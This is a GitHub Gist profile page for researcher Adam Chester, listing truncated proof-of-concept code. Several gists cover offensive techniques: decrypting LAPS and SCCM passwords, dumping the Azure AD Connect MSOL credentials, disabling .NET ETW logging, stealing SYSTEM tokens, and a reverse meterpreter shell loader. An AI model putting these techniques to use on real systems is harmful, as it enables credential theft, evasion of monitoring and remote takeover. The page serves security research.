Skip to content

Instantly share code, notes, and snippets.

View xpn's full-sized avatar
🦆
Migrated…

Adam Chester xpn

🦆
Migrated…
View GitHub Profile
@xpn
xpn / LAPSDecrypt.cs
Last active October 11, 2024 18:16
Quick POC looking at how encryption works for LAPS (v2)
using System;
using System.Collections.Generic;
using System.DirectoryServices.Protocols;
using System.Globalization;
using System.Linq;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices.ComTypes;
using System.Security.Policy;
using System.Security.Principal;
using System.Text;
@xpn
xpn / sccmdecryptpoc.cs
Last active October 5, 2024 08:02
SCCM Account Password Decryption POC
// Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;)
// Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work.
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
namespace SCCMDecryptPOC
{
internal class Program
@xpn
xpn / azuread_decrypt_msol_v2.ps1
Last active September 2, 2024 21:34
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync"
try {
$client.Open()
} catch {
Write-Host "[!] Could not connect to localdb..."
return
@xpn
xpn / clr_via_native.c
Created April 11, 2018 21:34
A quick example showing loading CLR via native code
#include "stdafx.h"
int main()
{
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
@xpn
xpn / tasks.cs
Created August 19, 2019 13:56
Create a .NET Type Dynamically at Runtime, Execute in Script. Prototype DynamicWrapperX , but not posting that publicly
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Reflection.Emit;
using System.Collections;
using System.Collections.Generic;
@xpn
xpn / env_var_spoofing_poc.cpp
Created June 6, 2020 21:25
A very rough x64 POC for spoofing environment variables (similar to argument spoofing) with a focus on setting the COMPlus_ETWEnabled=0 var used to disable ETW in .NET
// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET.
//
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables,
// and then resuming the process.
//
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/)
#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0"
#define INJECT_PARAM_LEN 43
@xpn
xpn / getsystem_parent.cpp
Created November 20, 2017 00:11
A POC to grab SYSTEM token privileges via PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
#include "stdafx.h"
BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) {
TOKEN_PRIVILEGES tp;
LUID luid;
TOKEN_PRIVILEGES tpPrevious;
DWORD cbPrevious = sizeof(TOKEN_PRIVILEGES);
if (!LookupPrivilegeValue(NULL, Privilege, &luid)) return FALSE;
@xpn
xpn / dotnet_etw.c
Created March 16, 2020 19:25
A demo of how to collect information on basic .NET events from ETW.
#define AssemblyDCStart_V1 155
#define MethodLoadVerbose_V1 143
#include <windows.h>
#include <stdio.h>
#include <wbemidl.h>
#include <wmistr.h>
#include <evntrace.h>
#include <Evntcons.h>
@xpn
xpn / libusb_xb_test.c
Created March 21, 2016 20:54
LibUSB test with XBOX One controller
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <libusb-1.0/libusb.h>
void printdev(libusb_device *dev) {
struct libusb_device_descriptor desc;
struct libusb_config_descriptor *config;
struct libusb_interface_descriptor *interdesc;
@xpn
xpn / invoke-shellcode.ps1
Created November 15, 2015 23:24
Calls invoke-shellcode.ps1 upon load with a reverse meterpreter shell, and connects to meterpreter.local on port 443
function Invoke-Shellcode
{
<#
.SYNOPSIS
Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process.
PowerSploit Function: Invoke-Shellcode
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause